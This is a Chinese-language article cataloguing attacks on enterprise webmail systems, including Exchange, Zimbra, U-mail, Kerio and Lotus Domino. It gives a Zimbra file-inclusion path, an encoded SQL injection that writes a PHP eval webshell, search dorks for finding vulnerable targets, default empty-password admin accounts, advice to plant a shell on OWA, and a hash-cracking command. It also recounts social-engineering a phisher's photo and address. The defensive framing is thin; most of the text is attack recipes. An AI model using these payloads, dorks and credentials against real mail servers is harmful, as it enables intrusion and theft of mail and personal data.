但是像上述的这些软件及平台都有一个共同的特征,那就是即时性。即时性的通信虽然有其独特的优点所在但是在企业级方面的安全性却得不到全方面的保障;电子邮件却恰恰相反,虽然即时通讯的能力不强,但是在企业级的安全性方面相对于即时通信还是略占优势的。根据一则报道显示:
“有52%的被调查者相信,与电子邮件相比,即时通信服务的速度更快,也更有效率;但76%的被调查者表示,他们相信即时通信服务只是一种补充的通信方式,但永远不会取代电子邮件。27%的被调查者还认为,即时通信服务不适合企业应用,主要原因是消费者在即时通信服务中缺乏安全性、责任性以及可记录的审计功能。”
以下是从网上收集到的一份国内企业的webmail的大致使用类型比例的统计图
……
当我们认为的安全不再安全,我们唯一能做的就是尽力去防御,去弥补这些不安全的因素。
所谓未知攻焉知防,我们接下来便来了解一下一些针对webmail的攻击方式
实验平台:kalilinux
工具:theharvester、jenny、metasploit
theharvester
是一个社会工程学工具,它通过搜索引擎、PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息。
Metasploit
Jenny
jenny是一款自动化的Web漏洞扫描工具。
适用于黑盒Web安全评估和渗透测试。
扫描单独网站扫描和旁站扫描两种扫描形式。
具有自动、轻量、智能等特点。
工具集成了一些web漏洞的扫描,还有Email地址的收集
但是相对于其他两款来说,效果不是太好。
(2)在这场攻与防的战斗中,社工是个独特的技能所在,他利用人们的好奇心理,诱使他人进入圈套。
一般来说,攻击者在确定目标后会以企业的某一个员工或者高管作为突破点,通过各种手段得到其邮件的控制权限。
在得到权限之后可能以VPN方式进入内网获取更大权限,抑或以伪造邮件的方式,将恶意代码或者程序隐藏在其中,
从而获得全面的信息,而他们的目标便是那些内网服务器里有价值的文件,抑或就是邮件里有价值的信息。
案例1:
测试代码:
案例2:
Exchange
微软的产品渗透中大家也最熟悉了漏洞不多
很多时候一个/owa就出来了
不管你社工库也好暴力破解也好猜密码也好进去就行了
其他的就是搜寻Password,VPN,密码或者其他有用东东。
1)owa/auth/test.aspx,OWA有一个报错机制,会把当前MAILBOX服务器或者当前的邮件服务器报出来。
2)ClientAccess\Owa\auth下面放个aspxshell是极好的
3)命令行邮件导出成pst文件必须掌握
案例3:
Mirapoint
全球四大邮件系统之一
1.mirapoint邮件系统存在ShellShock破壳漏洞(CVE-2014-6271)
存在ShellShock破壳漏洞(CVE-2014-6271),可远程执行任意命令
2.大量使用Mirapoint的邮件系统被自动化植入后门(统计中招比例1/5)
原文里提及“本来打算看看Mirapoint的源代码做下审计,结果发现两个可疑文件。”,大家可以自行查看。
案例4:
KerioConnect
1)登陆后导出联系人
POST:{“jsonrpc”:”2.0″,”id”:18,”method”:”Contacts.get”,”params”:{“folderIds”:[],”query”:{“start”:500,”limit”:500}}}
一般后台只能内网访问KerioConnect后台可导出用户信息和日志不能导密码
案例5:
本地文件包含的测试代码:
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgzv=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
如果能访问7071端口可以加管理员账户的权限提升测试工具下载:
Zimbra看版本:
如:上次更新日期2012/7/5VMwareZimbraCollaborationServer和VMwareZimbraCollaborationAppliance8.0
Zimbra默认后台
Zimbra还有个XSS漏洞这里就不提了~
案例6:
漏洞类型:bdconfig.iniDisclosure
漏洞细节:
获取到这些信息能干嘛看各自发挥了~
案例7:
postmaster管理员,
nobody,sec_bm,sec_sj密码都为空
这里虽然显示为普通账号,却具有【管理用户】的权限,而此处还存在一个设计缺陷,能看到任意用户的密码,包括管理员。
这里的密码为base64加密,如果后面有字符“3D”,需删掉再进行解密。
测试代码:
案例8:
弱口令:默认账号:nobody域:root密码:无
案例9:
漏洞类型:Open_redirect
关于Open_redirect漏洞的详细问题请访问如下链接:
案例10:
漏洞类型:SQL注入&&可直接Getshell
查看绝对路径:
也可以这样:
添加userapply.phpexecadd=333&DomainID=111
我们可以看到绝对路径为:D:\umail\WorldClient\html\userapply.php
构造语句:
aa’unionselect1,2,3,4,5,6,'
将上面的语句进行Base64加密YWElMjclMjB1bmlvbiUyMHNlbGVjdCUyMDElMkMyJTJDMyUyQzQlMkM1JTJDNiUyQyUyNyUzQyUzRnBocCUyMGV2YWwlMjglMjRfUE9TVDElMjklM0IlM0YlM0UlMjclMkM4JTJDOSUyQzEwJTJDMTElMkMxMiUyQzEzJTJDMTQlMjBpbnRvJTIwb3V0ZmlsZSUyMCUyN0QlM0EvdW1haWwvV29ybGRDbGllbnQvaHRtbC9ILnBocCUyNyUyMw==
然后将Base64加密后的语句添加到如下的URL后
此时已经将shell写进站点目录中:
shell地址:
Password:shell
然后用菜刀连接:
有些写进去文件不一定可以链接的到。具体原因不知···请自行探索。
U-mail的高危漏洞不仅仅只是上述案例这一个,还有好多:
案例11:
漏洞类型:CSRF
Dork:inurl:webmail/adminpanel/index.php
Exploit:
案例12:
漏洞类型:越权访问
利用Google或者Bing搜索关键字:
inurl:.nsf/WebHelp/!OpenPage
如:
jilinbsc.nsf/WebHelp/!OpenPage
当我们找到一个目标站点的时候,点击进去会发现该选项
中文为:转到收件箱
2)非常老的版本里面html代码里面HTTPPassword或dspHTTPPassword存着密码
./johnHASH.txt–format=lotus5
又扯多了,哎,来老外paper
案例13:
这里由于缺少案例我们直接引用wooyun提交的一则案列来说明。
利用步骤:
2)查看源代码,搜索“sessid”我们可以得到隐藏在源代码里的一串字符。
案例14:
漏洞类型:默认配置不当
漏洞细节
From:
漏洞利用步骤:
另外Extmail老版本登陆处有注入。
还有很多webmail,类似eYou之类,就不一一列举了。
案例15:
钓鱼邮件与反钓鱼:
上面例举了数个漏洞案例,但这些漏洞无一例外都是webmail程序自身的漏洞,但在现实的攻防实战中的手段可不仅仅是这一种,常见的还有钓鱼邮件。
攻击者通过伪造邮件,诱使管理员或个人用户点击从而获取被害人的敏感信息,甚至是将木马程序安装到电脑上,以实现长期监控的目的。
有两次各大互联网公司都遭遇钓鱼邮件攻击估计都有不同程度的应急吧?
由于存在目录遍历可以迅速的发现databases下的asp数据库文件
发现很多公司人员没有任何安全防范意识而中招看asp程序那就简单拿个shell分分钟的事情
再继续发现配置里面有个人信息
后续朋友帮忙社工到了该毛头小子的头像和住址就不一一详述了。
在企业重视安全后,企业内部组织安全意识和安全常识培训后,将企业的损失最小化。